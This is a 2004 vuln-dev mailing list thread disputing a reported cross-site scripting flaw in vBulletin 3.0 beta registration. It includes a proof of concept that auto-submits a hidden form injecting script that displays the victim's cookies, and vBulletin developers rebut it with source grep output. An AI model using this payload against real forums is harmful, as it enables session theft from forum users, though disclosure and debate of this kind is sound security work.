Vulnerability Development mailing list archives
RE: vBulletin Security Vulnerability - POC
From: "Ferruh Mavituna" <ferruh () mavituna com>
Date: Fri, 23 Jan 2004 23:34:43 +0200
I'm sending proof of concept again [ http://ferruh.mavituna.com/article/?256 - 06.08.2003 ]; Test this code in forums which are use "vBulletin v3.0.0 Beta 7". Most of them are vulnerable. I discovered this in "Beta 2" about 3 months ago. --------------------------------------------------------------- PROOF OF CONCEPT; --------------------------------------------------------------- <form action="http://[VICTIM - FORUM PATH]/register.php?do=register" method="post" style="display:none"> <input type="hidden" name="s" value="" /> <input type="hidden" name="regtype" value="1" /> <input type="text" class="bginput" name="field1" value="" size="25" maxlength="250" /> <input type="hidden" name="url" value="index.php" /> <input type="hidden" name="do" value="addmember" /> </form> <script> //Code that will be executed var xss = "\"><script>alert(document"+".cookie)<\/script>"; document.forms(0).field1.value=xss; document.forms(0).submit(); </script> --------------------------------------------------------------- --------------------------------------------------------------- Current vulnerable versions; --------------------------------------------------------------- vBulletin 3.0 Beta 2 <-> Beta 7 (If have standard / quick registration option) Ferruh.Mavituna http://feruh.mavituna.com PGPKey : http://ferruh.mavituna.com/PGPKey.asc Ferruh.Mavituna http://feruh.mavituna.com PGPKey : http://ferruh.mavituna.com/PGPKey.asc -----Original Message----- From: Scott MacVicar [mailto:scott () vbulletin com] Sent: Friday, January 23, 2004 8:10 PM To: ferruh () mavituna com Cc: kier () vbulletin com; vuln-dev () securityfocus com Subject: RE: vBulletin Security Vulnerability Hello, The issue you are now reporting is for a completely different version. And its not even the same problem. vBulletin 3 and vBulletin 2 are different code bases and again the issue that you are trying to identify is not present. ---------------------------- [root@devbox vb3b7]# grep -rna "regtype" * install/vbulletin-style.xml:6866:<input type="hidden" name="regtype" value="1" /> install/vbulletin-style.xml:7728: <input type="hidden" name="regtype" value="2" /> install/vbulletin-style.xml:12018: <label for="rb_regtype_1"><input type="radio" name="regtype" value="1" id="rb_regtype_1" checked="checked" /><b>Standard</b> - Normal, full length registration form.</label><br /> install/vbulletin-style.xml:12019: <label for="rb_regtype_2"><input type="radio" name="regtype" value="2" id="rb_regtype_2" /><b>Quick</b> - Shorter, but less option-filled registration form.</label><br /> install/vbulletin-style.xml:12094: <label for="rb_regtype_1"><input type="radio" name="regtype" value="1" id="rb_regtype_1" checked="checked" /><b>Standard</b> - Normal, full length registration form.</label><br /> install/vbulletin-style.xml:12095: <label for="rb_regtype_2"><input type="radio" name="regtype" value="2" id="rb_regtype_2" /><b>Quick</b> - Shorter, but less option-filled registration form.</label> register.php:1302: if ($_REQUEST['regtype'] == 2) ---------------------------- As you can see above the only time the variable regtype is reference is within the register.php code and it's a comparison and not directly outputted. The regtype was removed after Beta 7 for a new registration method. ---------------------- Scott MacVicar Developer, vBulletin
-----Original Message----- From: Ferruh Mavituna [mailto:ferruh () mavituna com] Sent: 23 January 2004 05:07 To: 'Kier Darby'; vuln-dev () securityfocus com Subject: RE: vBulletin Security Vulnerability Hello; This must be an option or something like that in new vBulletin, After a small search on Google you can find all "vBulletin v3.0.0 Beta 7" forums. -------------------------------------------------------------- ------------- "We can only assume that this vulnerability was found in a site running code modified from that supplied by Jelsoft." -------------------------------------------------------------- ------------- Not "a site", most of them vulnerable. If you provide this customization yes vBulletin is not vulnerable but "Jelsoft customizations" are vulnerable. And most of these forums have register.php "Standard / Quick" selection and "regtype" hidden field. Almost %80 of your customers are vulnerable. Ferruh.Mavituna http://feruh.mavituna.com PGPKey : http://ferruh.mavituna.com/PGPKey.asc -----Original Message----- From: Kier Darby [mailto:kier () vbulletin com] Sent: Wednesday, January 21, 2004 10:36 PM To: vuln-dev () securityfocus com Subject: Re: vBulletin Security Vulnerability In-Reply-To: <20040120190824.GA4674 () natalya rebby com> No patch has been issued for this 'vulnerability' because no vulnerability exists. There is no hidden field called "reg_site", nor any $reg_site variable anywhere in the vBulletin 2 or vBulletin 3 source code or templates, nor has it ever existed. We can only assume that this vulnerability was found in a site running code modified from that supplied by Jelsoft.
Current thread:
- vBulletin Security Vulnerability gcf (Jan 20)
- Re: vBulletin Security Vulnerability Curt Rebelein Junior (Jan 21)
- Re: vBulletin Security Vulnerability Curt Rebelein Junior (Jan 21)
- RE: vBulletin Security Vulnerability Ferruh Mavituna (Jan 21)
- <Possible follow-ups>
- Re: vBulletin Security Vulnerability Kier Darby (Jan 22)
- RE: vBulletin Security Vulnerability Ferruh Mavituna (Jan 23)
- RE: vBulletin Security Vulnerability Scott MacVicar (Jan 23)
- RE: vBulletin Security Vulnerability - POC Ferruh Mavituna (Jan 26)